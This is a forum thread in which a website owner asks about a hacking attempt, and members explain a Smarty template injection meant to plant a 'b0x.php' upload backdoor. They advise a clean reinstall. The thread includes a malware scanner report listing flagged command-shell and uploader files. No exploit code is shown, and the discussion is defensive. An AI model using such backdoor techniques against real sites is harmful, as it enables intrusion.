Hacking attempt. What should I do?

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Hacking attempt. What should I do?

Post by tech0925 »

Please have a look at this:

Image

What was the hacker trying to do? How can I protect against this or do you think osticket system is relatively safe? Also, I use an SSL 256 encryption certificate and sitelock. Not sure if that helps but I just don't want hacked. :banghead:

Here is some history,

I just left my old hosting company two days ago. I did not have that above security features and I noticed I was being hacked. The hackers were able to actually upload files to my server although I have never given out access to anyone. The password alone was almost impossible to crack. How they did it I dont know. So I moved my account and secured everything with a different hosting company. In less than 24 hours I got the above hack attempt.

Any advice would be so helpful. Just want to make sure I am not as vulnerable as before.
User avatar
social_experiment
DevNet Master
Posts: 2793
Joined: Sun Feb 15, 2009 11:08 am
Location: .za

Re: Hacking attempt. What should I do?

Post by social_experiment »

tech0925 wrote:The hackers were able to actually upload files to my server although I have never given out access to anyone. The password alone was almost impossible to crack.
Problem with passwords and secure details is that you are not always 100% in control of them. How did you get them; email (which is not secure for sending sensitive information)? Disgruntled employee somewhere could have leaked the information.

If the previous hosting company you used aren't able to tell you how the system was compromised it's a good thing that you stopped using their services.
“Don’t worry if it doesn’t work right. If everything did, you’d be out of a job.” - Mosher’s Law of Software Engineering
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

Thanks!
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: Hacking attempt. What should I do?

Post by Eric! »

It looks like you probably have a back door shell script installed in your site based on what they were trying to inject. Most likely your system is wide open to abuse now.

I suggest you get Mordred to fix the problem for you. He's our resident security guy for hire: viewtopic.php?f=17&t=129090
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

I did find some files that were flagged by my old hosting company and even picked up on by my mac spyware scanner. I was using a hacked version of WHMCS which these files were located in. I deleted all of these suspicious files before changing hosting companies. Maybe they were trying to access those but to no evail. On the nulled WHMCS it had a support system that I was using. However, I no longer use that. What do you think?
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Hacking attempt. What should I do?

Post by Mordred »

It looks like an attempt to inject a smarty php tag into the database, hoping that later it will be rendered and the code executed. I can't tell if it was successful from looking at this, but you can check:
The backdoor code will create a file "templates_c/b0x.php" containing a file upload form. Check if you have it on your new hosting.
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

THANK YOU! That was exactly what I wanted to hear. The files that I mentioned earlier that I deleted were all contained in a folder called templates_c that were located in that nulled version of WHCMS.

It was not successful! Thanks Mordred!
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Hacking attempt. What should I do?

Post by Mordred »

Hmm. It is normal to have templates_c - this is where Smarty keeps its compiled templates. The dangerous thing is not the folder, but the b0x.php file (that's a zero, careful when searching)
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

Ok.

I searched by entire server for b0x.php and nothing was found :) How could you tell by looking at that code that is was to create a file called b0x.php? The reason I ask is incase it happens again.

Here are the files that I had to remove before transferring hosting companies.

{HEX}php.uploader.max.535 : ./client/downloads/php/phpinfo.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/444fcb3d7706a2f520fce00972edf387^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/efb94a2b56c4dc5b09f16bce5f56a61b^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/%%F0^F0C^F0C915F5%%environ%00.tpl.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/e52dcc2ed92e5d571f2035410502b8b3^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/629a2b4c3bc9b25e3b8b2783b4916a7b^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}gzbase64.inject.unclassed.14 : ./client/templates_c/q.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/f6b4df64571de62d9f368301489283e7^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/9334b215f5682cad1498534380f598eb^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}php.uploader.max.535 : ./client/templates_c/red.php
{HEX}php.cmdshell.unclassed.343 : ./client/wsob2.php
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Hacking attempt. What should I do?

Post by Mordred »

b0x.php was from the screenshot you posted, of (presumably) your new installation.
There's no guarantee that it was used to compromise your old installation, nor there's a guarantee that some backdoor hasn't survived through whatever you used to dump those files you listed.
You should have reinstalled from a clean copy, not just move files from a compromised host.
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

I understand and thanks so much for the help. What I did was delete the entire script and did not upload to the new hosting company. I no longer use that script since it was compromised. I assumed that the hacker who nulled it probably shared info on how to get in. Thanks again. What I was referring to when asking you how you knew it was called b0x.php was how can you tell by looking at that code. If I see a code again in the future like that, how can I tell what it was trying to do?

Thanks Mordred, you rock buddy!
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Hacking attempt. What should I do?

Post by Mordred »

*shhht, don't tell anyone*: I googled the piece of the base64'ed code visible in your screenshot :)
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

LOL, thanks again for your help :)
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: Hacking attempt. What should I do?

Post by Eric! »

tech0925, like Mordred said there's a good chance you still have something else lurking in there. Just because you had someone try to inject a bOx.php backdoor doesn't mean that was what originally compromised your system. In the hacker world once someone brags about cracking a server, then everyone goes out and gives it a shot. It's possible the original back door is still there in the source. Even more possible is the original hole is still unplugged.

That's when it's handy to have a guy like Mordred test your system and find out how/where/why it was exploited. And unless the hole is patched odds are good they'll be back.
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

Thank you for the advice. Me and Mordred are in conversations about correcting issues when he has the time. I think I may have found the script that was the backdoor. Every injected file and hacks were going through it. I completely deleted it before transferring files to new hosting company. Other scripts I re-installed from new version. Hopefully I found and fixed the issues.

I even found a file known as php.info (I think that is what it was called) that clearly showed everything about my server in that bad script. I assume that was a big help to the hackers. Thanks again!
Post Reply